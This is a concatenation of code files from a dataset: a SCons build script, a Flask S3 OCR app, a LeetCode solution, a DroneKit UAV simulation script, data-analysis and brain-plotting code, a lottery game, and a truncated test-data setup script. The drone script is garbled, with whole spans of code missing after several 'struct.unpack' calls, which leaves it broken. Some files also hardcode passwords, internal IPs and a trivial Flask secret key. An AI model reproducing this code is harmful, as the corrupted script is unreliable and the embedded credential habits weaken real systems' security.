--cpp_out=.\")\nriak_protocol = env.Object(library_build_path + 'riakclient.pb.o', library_build_path + 'riakclient.pb.cc')\nlibrary = env.StaticLibrary('riak', [sources, riak_protocol], build_dir=library_build_path)\n\n# Unit tests are compiled and run every time the program is compiled.\nExport('env')\nExport('library')\n\nif 'debian' in COMMAND_LINE_TARGETS:\n SConscript(\"deb/SConscript\")\n\nunit_tests = SConscript('test/SConscript', variant_dir='build/test/units')\nAddPostAction(unit_tests, unit_tests[0].path)\n\nDefault(library, unit_tests)\n\n#\n# Installation\n#\nprefix = '/usr/local'\nenv.Alias('install', env.Install('/usr/local/lib', library))\nenv.Alias('install', env.Install('/usr/local/include/riak', headers))\nenv.Alias('install', env.Install('/usr/local/include/riak/transports', transports))\n","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193714500","text":"from flask import Flask, render_template, request, redirect, url_for, flash, \\\n Response, session\nfrom flask_bootstrap import Bootstrap\nfrom filters import datetimeformat, file_type\nfrom resources import get_bucket, get_buckets_list,client_list\nfrom pipev1 import main\nimport os\nimport time\nfrom config import S3_BUCKET,S3_BUCKET_NAME\n#from numba import jit\n\nroot_dir='/tmp/'\nwork_dir=os.getcwd()+'/'\n\nos.environ.update(dict(LD_LIBRARY_PATH=os.getcwd()+'/lib/',TESSDATA_PREFIX=os.getcwd()+'/tessdata/'))\n\nif not os.path.exists(root_dir+'txt'):\n os.mkdir('/tmp/txt')\nif not os.path.exists(root_dir+'jpg'):\n os.mkdir('/tmp/jpg')\nif not os.path.exists(root_dir+'pdfs'):\n os.mkdir('/tmp/pdfs')\n\n\napp = Flask(__name__)\nBootstrap(app)\napp.secret_key = 'secret'\napp.jinja_env.filters['datetimeformat'] = datetimeformat\napp.jinja_env.filters['file_type'] = file_type\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n bucket = request.form['bucket']\n session['bucket'] = bucket\n return redirect(url_for('files'))\n else:\n buckets = get_buckets_list()\n return render_template(\"index.html\", buckets=buckets)\n\n\n@app.route('/files')\ndef files():\n my_bucket = get_bucket()\n summaries = my_bucket.objects.all()\n\n return render_template('files.html', my_bucket=my_bucket, files=summaries)\n\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n file = request.files['file']\n\n my_bucket = get_bucket()\n my_bucket.Object(file.filename).put(Body=file)\n\n flash('File uploaded successfully')\n return redirect(url_for('files'))\n\n#@jit(nopython=True)\n@app.route('/convert', methods=['POST'])\ndef convert():\n pdf_dir=root_dir+'pdfs/'\n key = request.form['key']\n\n my_bucket = get_bucket()\n #print(dir(get_bucket()))\n path,filename = os.path.split(key)\n target_path=pdf_dir +filename\n my_bucket.download_file(key,target_path )\n #os.system('rm -r '+work_dir+'static/pdf/*')\n ##### the conversion phase ####\n avg_score,completed=main(target_path)\n print('OCR EXECUTION TIME:',completed)\n ##############################\n client=client_list()\n client.upload_file('/tmp/merged_file.pdf',S3_BUCKET_NAME,'merged_'+filename[:-4]+'.pdf')\n client.upload_file('/tmp/verbose.txt',S3_BUCKET_NAME,'verbose_'+filename[:-4]+'.txt')\n return redirect(url_for('files'))\n\n\n@app.route('/view', methods=['POST'])\ndef view():\n pdf_dir='static/pdf/'\n os.system('rm static/pdf/*')\n key = request.form['key']\n\n my_bucket = get_bucket()\n #print(dir(get_bucket()))\n path,filename = os.path.split(key)\n print(filename)\n target_path=pdf_dir +filename\n my_bucket.download_file(key,target_path)\n return render_template('view.html',contents='[\"'+filename+'\"]')\n\n\n\n@app.route('/download', methods=['POST'])\ndef download():\n key = request.form['key']\n\n my_bucket = get_bucket()\n file_obj = my_bucket.Object(key).get()\n\n return Response(\n file_obj['Body'].read(),\n mimetype='text/plain',\n headers={\"Content-Disposition\": \"attachment;filename={}\".format(key)})\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n key = request.form['key']\n\n my_bucket = get_bucket()\n my_bucket.Object(key).delete()\n\n flash('File deleted successfully')\n return redirect(url_for('files'))\n\n\n\ndef wait():\n return render_template('loading.html')\n\n\n\nif __name__ == \"__main__\":\n app.run(port=8000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9131141","text":"\"\"\"\n{\n \"author\": \"Yucheng Huang\",\n \"difficulty\": \"easy\",\n \"link\": \"https://leetcode.com/problems/majority-element/description/\",\n \"beats\": 0.4223,\n \"category\": [\"math\"],\n \"tags\": [],\n \"questions\": []\n}\n\"\"\"\n\n\"\"\"\n思路\n\t- 利用 Boyer-Moore Majority Vote Algorithm\n\t- 使用 cnt 来统计一个元素出现的次数,当遍历到的元素和统计元素不相等时,令 cnt--。如果前面查找了 i 个元素,且 cnt == 0,说明前 i 个元素没有 majority,或者有 majority,但是出现的次数少于 i / 2,因为如果多于 i / 2 的话 cnt 就一定不会为 0。此时剩下的 n - i 个元素中,majority 的数目依然多于 (n - i) / 2,因此继续查找就能找出 majority。\n\"\"\"\n\nclass Solution:\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n num = nums[0]\n L = len(nums)\n count = 1\n if L>1:\n for i in range(1, L):\n if nums[i] == num:\n count += 1\n else :\n count -= 1\n if count < 0:\n num = nums[i]\n count = 1\n return num","sub_path":"solutions/169.boyer-moore.py","file_name":"169.boyer-moore.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"613826891","text":"# DroneKit-Python program based on the \"Simple Go To (Copter)\" example.\n# Time is synchronized to simulation clock through the \"simtime\" library.\n\nimport helper\nimport math\nimport ns3interface\nimport simtime\nimport struct\nimport sys\nimport time\nfrom threading import Thread\nimport pdb ## biblioteca de rastreamento\n\n# pip install --user dronekit\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative\nfrom pymavlink import mavutil\n\n# Synchronize time.time() and time.sleep(n) with simulation clock\nsimtime_port = int(sys.argv[1])\nsimtime.connect(simtime_port)\n\n# Parse other commandline arguments\nuav_name, mavlink_sysid, mavlink_port = sys.argv[2].split(':')\nmavlink_sysid = int(mavlink_sysid)\nmavlink_port = int(mavlink_port)\n\n# Connect to the ns3 network simulator\nns3interface.connect('127.0.0.1', mavlink_sysid - 1)\n\n# Connect to the Vehicle\nvehicle = connect(\n 'tcp:127.0.0.1:{}'.format(mavlink_port),\n source_system=mavlink_sysid + 100)\n\n# ArduCopter initialisation can take a really long time\nvehicle.wait_ready('gps_0', 'armed', 'mode', 'attitude', timeout=100)\n\n# Don't try to arm until autopilot is ready\nwhile not vehicle.is_armable:\n print(\" Waiting for vehicle to initialise...\")\n time.sleep(5)\n\nprint(\"Arming motors\")\n# Copter should arm in GUIDED mode\nvehicle.mode = VehicleMode(\"GUIDED\")\nvehicle.armed = True\n\n\n# Confirm vehicle armed before attempting to take off\nwhile not vehicle.armed:\n print(\" Waiting for arming...\")\n time.sleep(1)\n\n##pdb.set_trace()\n\ntarget_altitude = 5\nShortestDistance = 2\n\n\nprint(\"Taking off!\")\nvehicle.simple_takeoff(target_altitude) # Take off to target altitude\ntime.sleep(10)\n\ndef uavSendMessage(mavlink_sysid):\n# Process incoming messages\n #cont=0\n while True:\n while ns3interface.message_available():\n payload, sender = ns3interface.recvfrom()\n seqnum, lat, lon = struct.unpack(\" 0:\n # cont = cont+1\n # ns3interface.sendto(struct.pack(\" ShortestDistance):\n # diferenca entre o ponto de inicio da prova e a distancia minima entre veiculos\n vehicle.simple_goto(MissionPoint, groundspeed=30)\n currentPosition = vehicle.location.global_relative_frame\n distanceOfEnd = helper.get_distance_metres(MissionPoint, currentPosition)\n time.sleep(.1)\n\n distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n\n while (distanceOfBegin > ShortestDistance):\n vehicle.simple_goto(startMissionPoint, groundspeed=30)\n currentPosition = vehicle.location.global_relative_frame\n distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n time.sleep(.1)\n\n\n\n print(\"Landing!\")\n vehicle.mode = VehicleMode(\"RTL\")\n\n\nelif mavlink_sysid == 2:\n\n lat = vehicle.location.global_relative_frame.lat\n lon = vehicle.location.global_relative_frame.lon\n startMissionPoint = LocationGlobalRelative(lat, lon, target_altitude)\n MissionPoint = LocationGlobalRelative(-27.60349,-48.51796,target_altitude)\n vehicle.simple_goto(startMissionPoint, groundspeed=10)\n\n\n while True:\n\n ns3interface.sendto(struct.pack(\" ShortestDistance):\n # diferenca entre o ponto de inicio da prova e a distancia minima entre veiculos\n vehicle.simple_goto(MissionPoint, groundspeed=10)\n currentPosition = vehicle.location.global_relative_frame\n distanceOfEnd = helper.get_distance_metres(MissionPoint, currentPosition)\n time.sleep(.1)\n\n distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n\n while (distanceOfBegin > ShortestDistance):\n vehicle.simple_goto(startMissionPoint, groundspeed=10)\n currentPosition = vehicle.location.global_relative_frame\n distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n time.sleep(.1)\n\n\n\n print(\"Landing!\")\n vehicle.mode = VehicleMode(\"RTL\")\n\n\n\nelif mavlink_sysid == 3:\n #position in map in relation to base (-1, -1,5)\n lat = vehicle.location.global_relative_frame.lat\n lon = vehicle.location.global_relative_frame.lon\n startMissionPoint = LocationGlobalRelative(lat, lon, target_altitude)\n MissionPoint = LocationGlobalRelative(-27.60391, -48.51789, target_altitude)\n vehicle.simple_goto(startMissionPoint, groundspeed=20)\n\n while True:\n\n ns3interface.sendto(struct.pack(\" ShortestDistance):\n # diferenca entre o ponto de inicio da prova e a distancia minima entre veiculos\n vehicle.simple_goto(MissionPoint, groundspeed=20)\n currentPosition = vehicle.location.global_relative_frame\n distanceOfEnd = helper.get_distance_metres(MissionPoint, currentPosition)\n time.sleep(.1)\n\n distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n\n while (distanceOfBegin > ShortestDistance):\n vehicle.simple_goto(startMissionPoint, groundspeed=20)\n currentPosition = vehicle.location.global_relative_frame\n distanceOfBegin = helper.get_distance_metres(startMissionPoint, currentPosition)\n time.sleep(.1)\n\n\n print(\"Landing!\")\n vehicle.mode = VehicleMode(\"RTL\")\n\n\n\nvehicle.close()\n\nsys.exit(\"End of experiment!\")\n","sub_path":"tutorial/3nodosGazebo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143459552","text":"import pandas as pd\nimport numpy as np\nimport os\nimport time\nimport calendar\nfrom pandas import DataFrame\nfrom datetime import datetime\n\npath = os.getcwd()\nrelpath = path+'/Data/vehicle_collisions.csv'\ndf = pd.read_csv(relpath)\ndf['DATE']=pd.to_datetime(df[\"DATE\"])\ndf2=df[(df['DATE'].dt.year==2016)]\ndf2['Month'] = (df['DATE'].dt.month).apply(lambda x: calendar.month_abbr[x])\ndatas = df2['DATE'].groupby(df2['DATE'].dt.strftime('%b')).count()\ndf3 = df2.groupby(['BOROUGH', 'Month']).count()\ndf4 = df3['DATE'].loc['MANHATTAN']\nmanhattan = np.array([df4.index,df4])\nnyc = np.array([datas.index,datas])\nperc = manhattan[1]/nyc[1]\nacc1 = [nyc[0],manhattan[1],nyc[1],perc]\ndf5 = pd.DataFrame(acc1)\ndf6= df5.T\ndf6.columns = ['Month', 'Manhattan', 'NYC','Percentage']\ndf6.to_csv(\"Q1P1.csv\")\nprint(df6.head())","sub_path":"Q1_Part_1.py","file_name":"Q1_Part_1.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"631409293","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set()\nfrom nilearn import plotting as ni_plt\nimport matplotlib.gridspec as gridspec\nimport sys\nsys.path.append('..')\nfrom util.analysis_utils import get_important_electrodes_bins_goodchans\n\n\n\ndef plot_all(configs):\n imp_electrodes, imp_bins, good_chans = get_important_electrodes_bins_goodchans(configs)\n plot_important_frequencies(imp_bins)\n plot_important_electrodes(imp_electrodes,good_chans)\n plot_brain_new(chan_labels = good_chans, colors = imp_electrodes)\n \n \n\ndef plot_brain(chan_labels,num_grid_chans=64,colors=list()):\n# mni_coords_fullfile='/nas/ecog_project/derived/electrode_mni_locations/cb46fd46_MNI_atlasRegions.xlsx'\n mni_coords_fullfile = '/data2/users/stepeter/mni_coords/cb46fd46/cb46fd46_MNI_atlasRegions.xlsx'\n 'Plots ECoG electrodes from MNI coordinate file'\n #Example code to run it: \n #import sys\n #sys.path.append('/home/stepeter/AJILE/stepeter_sandbox/ECoG_Preprocessing')\n #from plot_ecog_electrodes_mni import *\n\n #mni_coords_fullfile='/data2/users/stepeter/mni_coords/a0f66459/a0f66459_MNI_atlasRegions.xlsx'\n #plot_ecog_electrodes_mni_from_file_and_labels(mni_coords_fullfile,chan_num_min=-1,chan_num_max=-1,num_grid_chans=64)\n\n #NOTE: A warning may pop up the first time running it, leading to no output. Rerun this function, and the plots should appear.\n\n #Load in MNI file\n mni_file = pd.read_excel(mni_coords_fullfile, delimiter=\",\")\n\n\n #Create dataframe for electrode locations\n locs=mni_file.loc[mni_file['Electrode'].isin(chan_labels)][['X coor', 'Y coor', 'Z coor']]\n print(locs.shape)\n\n #Label strips/depths differently for easier visualization (or use defined color list)\n if len(colors)==0:\n for s in range(locs.shape[0]):\n if s>=num_grid_chans:\n colors.append('r')\n else:\n colors.append('b')\n\n #Plot the result\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': 0.5, 'edgecolors': None},\n node_size=10, node_color=colors)\n\n \n \ndef plot_important_frequencies(imp_bins):\n df = pd.DataFrame({'Frequencies':['0-1', '2','3-4','5-8','9-16','17-32','33-64','65-150'], 'Importances': imp_bins})\n sns.barplot(data=df,x = 'Frequencies', y = 'Importances')\n plt.ylabel('Importance')\n plt.show()\n \n \ndef plot_important_electrodes(imp_electrodes,good_chans):\n imp_ele = np.argsort(imp_electrodes)[-5:]\n imp = np.zeros(len(good_chans), dtype='bool')\n imp[imp_ele] =1 \n df = pd.DataFrame({'Labels': good_chans,'Importances': imp_electrodes, 'Top 5': imp})\n plt.figure(figsize=(10,20))\n sns.barplot(data=df,y = 'Labels', x = 'Importances', hue = 'Top 5')\n plt.show()\n\n \n\ndef plot_brain_new(h5_fn=None,chan_labels='all',num_grid_chans=64,colors=None,node_size=50,\n figsize=(16,6),sides_2_display='auto',node_edge_colors=None,\n alpha=0.5,edge_linewidths=3,ax_in=None,rem_zero_chans=False,\n allLH=False,zero_rem_thresh=.99,elec_col_suppl=None):\n \"\"\"\n Plots ECoG electrodes from MNI coordinate file (only for specified labels)\n \n Example code to run it: \n import sys\n sys.path.append('/home/stepeter/AJILE/stepeter_sandbox/ECoG_Preprocessing')\n from Steve_libPreprocess import *\n subjID = 'a0f66459'\n day = '3'\n h5_fn='/nas/ecog_project/derived/processed_ecog/'+subjID+'/full_day_ecog/'+subjID+'_fullday_'+day+'.h5'\n chan_labels=list(['GRID1','GRID2']) #or chan_labels='all'\n plot_ecog_electrodes_mni_from_file_and_labels(h5_fn,chan_labels,num_grid_chans=64)\n \n NOTE: If running in Jupyter, use '%matplotlib inline' instead of '%matplotlib notebook'\n \"\"\" \n \n h5_fn = '/nas/ecog_project/derived/processed_ecog/cb46fd46/full_day_ecog/cb46fd46_fullday_3.h5'\n #Load channel locations\n chan_info = pd.read_hdf(h5_fn,key='chan_info',mode='r')\n \n if type(chan_labels) == np.ndarray:\n my_id = False\n elif chan_labels == 'all':\n my_id = 'all'\n else:\n print('hier nicht eig')\n my_id = 'allgood'\n \n #Create dataframe for electrode locations\n if my_id== 'all':\n locs = chan_info.loc[['X','Y','Z'],:].transpose()\n elif my_id == 'allgood':\n locs = chan_info.loc[['X','Y','Z','goodChanInds'],:].transpose()\n else:\n locs = chan_info.loc[['X','Y','Z'],chan_labels].transpose()\n if (colors is not None):\n if (locs.shape[0]>len(colors)) & isinstance(colors, list):\n locs = locs.iloc[:len(colors),:]\n locs.rename(columns={'X':'x','Y':'y','Z':'z'}, inplace=True)\n chan_loc_x = chan_info.loc['X',:].values\n \n #Remove NaN electrode locations (no location info)\n nan_drop_inds = np.nonzero(np.isnan(chan_loc_x))[0]\n locs.dropna(axis=0,inplace=True) #remove NaN locations\n if (colors is not None) & isinstance(colors, list):\n colors_new,loc_inds_2_drop = [],[]\n for s,val in enumerate(colors):\n if not (s in nan_drop_inds):\n colors_new.append(val)\n else:\n loc_inds_2_drop.append(s)\n colors = colors_new.copy()\n \n if elec_col_suppl is not None:\n loc_inds_2_drop.reverse() #go from high to low values\n for val in loc_inds_2_drop:\n del elec_col_suppl[val]\n \n if my_id=='allgood':\n goodChanInds = chan_info.loc['goodChanInds',:].transpose()\n inds2drop = np.nonzero(locs['goodChanInds']==0)[0]\n locs.drop(columns=['goodChanInds'],inplace=True)\n locs.drop(locs.index[inds2drop],inplace=True)\n \n if colors is not None:\n colors_new,loc_inds_2_drop = [],[]\n for s,val in enumerate(colors):\n if not (s in inds2drop):\n# np.all(s!=inds2drop):\n colors_new.append(val)\n else:\n loc_inds_2_drop.append(s)\n colors = colors_new.copy()\n \n if elec_col_suppl is not None:\n loc_inds_2_drop.reverse() #go from high to low values\n for val in loc_inds_2_drop:\n del elec_col_suppl[val]\n \n if rem_zero_chans:\n #Remove channels with zero values (white colors)\n colors_new,loc_inds_2_drop = [],[]\n for s,val in enumerate(colors):\n if np.mean(val)1:\n N,axes,sides_2_display = _setup_subplot_view(locs,sides_2_display,figsize)\n else:\n N = 1\n axes = ax_in\n if allLH:\n average_xpos_sign = np.mean(np.asarray(locs['x']))\n if average_xpos_sign>0:\n locs['x'] = -locs['x']\n sides_2_display ='l'\n# #Automatically flip electrode side appropriately\n# if (sides_2_display=='r') or (sides_2_display=='l'):\n# average_xpos_sign = np.mean(np.asarray(locs['x']))\n# if average_xpos_sign>0:\n# sides_2_display='r'\n# else:\n# sides_2_display='l'\n \n if colors is None:\n colors = list()\n \n #Label strips/depths differently for easier visualization (or use defined color list)\n if len(colors)==0:\n for s in range(locs.shape[0]):\n if s>=num_grid_chans:\n colors.append('r')\n else:\n colors.append('b')\n \n if elec_col_suppl is not None:\n colors = elec_col_suppl.copy()\n \n #Rearrange to plot non-grid electrode first\n if num_grid_chans>0: #isinstance(colors, list):\n locs2 = locs.copy()\n locs2['x'] = np.concatenate((locs['x'][num_grid_chans:],locs['x'][:num_grid_chans]),axis=0)\n locs2['y'] = np.concatenate((locs['y'][num_grid_chans:],locs['y'][:num_grid_chans]),axis=0)\n locs2['z'] = np.concatenate((locs['z'][num_grid_chans:],locs['z'][:num_grid_chans]),axis=0)\n \n if isinstance(colors, list):\n colors2 = colors.copy()\n colors2 = colors[num_grid_chans:]+colors[:num_grid_chans]\n else:\n colors2 = colors\n else:\n locs2 = locs.copy()\n if isinstance(colors, list):\n colors2 = colors.copy()\n else:\n colors2 = colors #[colors for i in range(locs2.shape[0])]\n \n #Plot the result\n _plot_electrodes(locs2,node_size,colors2,axes,sides_2_display,N,node_edge_colors,alpha,edge_linewidths)\n \ndef _setup_subplot_view(locs,sides_2_display,figsize):\n \"\"\"\n Decide whether to plot L or R hemisphere based on x coordinates\n \"\"\"\n if sides_2_display=='auto':\n average_xpos_sign = np.mean(np.asarray(locs['x']))\n if average_xpos_sign>0:\n sides_2_display='yrz'\n else:\n sides_2_display='ylz'\n \n #Create figure and axes\n if sides_2_display=='ortho':\n N = 1\n else:\n N = len(sides_2_display)\n \n if sides_2_display=='yrz' or sides_2_display=='ylz':\n gridspec.GridSpec(0,3)\n fig,axes=plt.subplots(1,N, figsize=figsize)\n else:\n fig,axes=plt.subplots(1,N, figsize=figsize)\n return N,axes,sides_2_display\n\n\ndef _plot_electrodes(locs,node_size,colors,axes,sides_2_display,N,node_edge_colors,alpha,edge_linewidths):\n \"\"\"\n Handles plotting\n \"\"\"\n if N==1:\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': alpha, 'edgecolors': node_edge_colors,'linewidths':edge_linewidths},\n node_size=node_size, node_color=colors,axes=axes,display_mode=sides_2_display)\n elif sides_2_display=='yrz' or sides_2_display=='ylz':\n colspans=[5,6,5] #different sized subplot to make saggital view similar size to other two slices\n current_col=0\n total_colspans=int(np.sum(np.asarray(colspans)))\n for ind,colspan in enumerate(colspans):\n axes[ind]=plt.subplot2grid((1,total_colspans), (0,current_col), colspan=colspan, rowspan=1)\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': alpha, 'edgecolors': node_edge_colors,'linewidths':edge_linewidths},\n node_size=node_size, node_color=colors,axes=axes[ind],display_mode=sides_2_display[ind])\n current_col+=colspan\n else:\n for i in range(N):\n ni_plt.plot_connectome(np.eye(locs.shape[0]), locs, output_file=None,\n node_kwargs={'alpha': alpha, 'edgecolors': node_edge_colors,'linewidths':edge_linewidths},\n node_size=node_size, node_color=colors,axes=axes[i],display_mode=sides_2_display[i])\n\n","sub_path":"vis/brain_vis.py","file_name":"brain_vis.py","file_ext":"py","file_size_in_byte":11519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"297484407","text":"# Created on 10-19-2020, Monday\nprint(\"Welcome to the Pick 6 Game! \")\nbalance = float()\nprint(f\"Your balance is : $ {balance}\")\nimport random\n\nwinning_ticket = random.sample(range(1,99),6) # This is a list contains all winning number\nprint(f\"The winner number is {winning_ticket}\")\n\n\ndef pick6(): # this function is used to draw 5 random number to represnet the ticket that will be used to validate against the winning ticket\n pick = random.sample(range(1,99), 6) # This is a list represent player's ticket\n return(pick)\n\ndef validate_match(): # this function will count the # of match for each ticket randomly picked\n match_count = 0\n user_ticket = pick6()\n # print(user_ticket)\n for element in user_ticket: \n index = user_ticket.index(element) # running check of the player's list against winner's list for both numer and index\n winning_number = winning_ticket[index]\n if element == winning_number:\n match_count += 1 \n # print(f\"there is a match! {winning_number}\") \n else:\n pass \n # print(f\"# of mathces: {match_count}\") \n return(match_count)\n\ndef payoff_calc(): # This function will calculate the total cost of all tickets as well as all compensation \n payofflist = { \n 0:0,\n 1:4,\n 2:7,\n 3:100,\n 4:50000,\n 5:1000000,\n 6:25000000}\n attempt = int(input(\"How many tickets would you like to draw: \"))\n payoff = 0 \n for a in range(attempt):\n count = validate_match()\n payoff += payofflist[count]\n \n cost = attempt*2\n print(f\"your final balance is ${float(payoff)}\")\n\n\npayoff_calc()\n\n\n\n\n\n\n# number_of_ticket = 1\n# while number_of_ticket in range(1,11):\n# cost += validate_match(match_count)\n# number_of_ticket += 1\n\n# print(match_count)\n# print(cost)\n\n\n# payoff = {\n# 1:4,\n# 2:7,\n# 3:100,\n# 4:50000,\n# 5:1000000,\n# 6:25000000\n# }\n\n#testing testing 11/4","sub_path":"Students/Ben/Lab_14_Pick6/Pick6.py","file_name":"Pick6.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"245089943","text":"#coding:utf-8\nimport time\nimport requests\nimport json\nimport logging\nimport redis\nimport urllib2\nimport hashlib\nimport MySQLdb\nfrom warnings import filterwarnings\nfilterwarnings('ignore', category = MySQLdb.Warning)\nclass preConditionForTest(object):\n \"\"\"\n 测试环境,常州账号数据准备测试:\n 1.发放优惠券, 满30减5\n 2.发放红包,满40减10\n 3.发放达豆,默认2000\n 4.上架物品, 价格50,数量100\n 5.本地存储用户名,logindevice表\n 6.本地存储上架物品,productcz表\n 7.本地存储优惠码,coupon表\n 8.清除购物车redis缓存信息\n \"\"\"\n def __init__(self):\n self.headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'}\n \"\"\"\n server_url:测试环境后台url \n url_username:后台登陆账号\n url_password:后台登陆密码\n \"\"\"\n self.server_url = 'http://192.168.1.251:31000'\n self.url_username= '13111111111'\n self.url_password='123456'\n \"\"\"\n test_db_ip:测试环境ip,默认端口3306\n test_user:用户名\n test_passwd:密码\n test_mainDb:测试环境 数据库\n \"\"\"\n self.test_db_ip = '192.168.1.101'\n self.test_user = 'dddev'\n self.test_passwd = '123456'\n self.test_mainDb='ctcdb_new_test'\n \"\"\"\n redis_db_ip:缓存数据库redis地址\n redis_port:redis端口\n redis_db:数据库0\n \"\"\"\n self.redis_db_ip='192.168.1.101'\n self.redis_port=6379\n self.redis_db=0\n \"\"\"\n local_ip:本地数据库192.168.1.38,默认localhost,端口3306\n local_user:用户名\n local_passwd:密码\n local_mainDb:本地数据库名\n \"\"\"\n self.local_ip='192.168.1.38'\n self.local_user='root'\n self.local_passwd='admin'\n self.local_mainDb='dianda_test'\n \"\"\"\n cityId:常州城市码\n \"\"\"\n self.cityId=320400\n \"\"\"\n dadouCount:发放达豆数量\n \"\"\"\n self.dadouCount=2000\n \"\"\"\n device_login:设备登陆密码\n \"\"\"\n self.device_login='123456'\n \"\"\"\n coupon_value:优惠券金额\n coupon_quantity:优惠券发放数量\n coupon_useBaseLine:使用金额条件\n coupon_instruction:描述\n \"\"\"\n self.coupon_value=5\n self.coupon_quantity=5\n self.coupon_useBaseLine=30\n self.coupon_instruction=u'满30减5'\n \"\"\"\n redGift_value:红包金额\n redGift_quantity:红包发放数量\n redGift_ownLimit:红包拥有限制量\n redGift_useBaseLine:红包使用条件\n redGift_instruction:描述\n \"\"\"\n self.redGift_value=10\n self.redGift_quantity=5\n self.redGift_ownLimit=5\n self.redGift_useBaseLine=40\n self.redGift_instruction=u'满40减10'\n \"\"\"\n product_price:上架产品的价格\n procuct_limit:上架产品的数量\n \"\"\"\n self.product_price=50\n self.procuct_limit=100\n \"\"\"\n conn_test:初始化链接测试环境数据库\n conn_local:初始化链接本地数据库\n \"\"\"\n self.conn_test = MySQLdb.connect(host=self.test_db_ip, user=self.test_user, passwd=self.test_passwd, port=3306,charset=\"utf8\")\n self.conn_local = MySQLdb.connect(host=self.local_ip, user=self.local_user, passwd=self.local_passwd, port=3306, charset=\"utf8\")\n\n \"\"\"\n session:初始化session节点\n \"\"\"\n self.session=requests.Session()\n \"\"\"\n 初始化log格式\n \"\"\"\n logging.basicConfig(\n level=logging.DEBUG,\n format='[%(asctime)s] [%(levelname)s] %(message)s',\n datefmt='%Y_%m_%d %H:%M:%S',\n )\n @classmethod\n def changeIntoStr(cls,data,str_data=''):\n if isinstance(data, unicode):\n str_data = data.encode('utf-8')\n elif isinstance(data, str):\n str_data = data\n return str_data\n\n @classmethod\n def returnMd5(cls,pwd):\n md = hashlib.md5()\n md.update(pwd)\n return md.hexdigest()\n\n @staticmethod\n def createTime():\n \"\"\"\n :return: 返回发放开始时间,发放结束时间,可使用开始时间,可使用结束时间\n \"\"\"\n grantStart = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()- 1* 60 * 60))\n useStart = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()- 2* 60 * 60))\n useEnd = grantEnd = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time() + 24 * 60 * 60))\n return grantStart, grantEnd, useStart, useEnd\n\n @staticmethod\n def createName():\n \"\"\"\n :return:返回自动创建名字\n \"\"\"\n couponName = u'自动测' + str(int(time.time()))\n return couponName\n\n def newCoupon(self):\n \"\"\"\n 创建优惠码\n :return:\n \"\"\"\n couponName=self.createName()\n grantStart,grantEnd,useStart,useEnd=self.createTime()\n #登陆后台\n login_url='{0}/users/login'.format(self.server_url)\n login_data={'userName':self.url_username,'password':self.url_password}\n login_response=self.session.post(url=login_url,data=login_data,headers=self.headers)\n #选择城市\n changzhou_url='{0}/users/updateAgency'.format(self.server_url)\n changzhou_data={'cityId':self.cityId,'agencyId':3}\n chanzhou_response=self.session.post(url=changzhou_url,data=changzhou_data,headers=self.headers)\n #创建单\n youhuiquan_url='{0}/json/management/coupon/addCoupon'.format(self.server_url)\n \"\"\"\n type:2, 优惠码\n grantType:-1 无兑换条件\n lifeTime:-1 无领取时间限制\n \"\"\"\n youhuiquan_data={'couponName':couponName,'type':2,'grantType':'-1','value':self.coupon_value,'grantStart':grantStart,\n 'grantEnd':grantEnd,'useStart':useStart,'useEnd':useEnd,\n 'lifeTime':'-1','quantity':self.coupon_quantity,'useBaseLine':self.coupon_useBaseLine,'instruction':self.coupon_instruction}\n youhuiquan_response=self.session.post(youhuiquan_url,data=youhuiquan_data,headers=self.headers)\n youhuiquan_strdata = self.changeIntoStr(youhuiquan_response.text)\n youhuiquan_json=json.loads(youhuiquan_strdata)\n #点击导出\n daochu_url='{0}/json/management/coupon/queryCoupon?id={1}'.format(self.server_url,str(youhuiquan_json['gift']['id']))\n daochu_response=self.session.get(url=daochu_url,headers=self.headers)\n daochu_data=self.changeIntoStr(daochu_response.text)\n testdata=json.loads(daochu_data)\n #拼接下载url地址\n test_url = '{7}/json/management/coupon/code/generate?couponCodeBaseSettingId={0}' \\\n '&name={1}&useStart={2}&useEnd={3}&quantity={4}&value={5}&useBaseLine={6}'.format( testdata['data']['id'],\n urllib2.quote(testdata['data']['couponName'].encode('utf-8')),\n testdata['data']['useStartTime'],\n testdata['data']['useEndTime'],\n 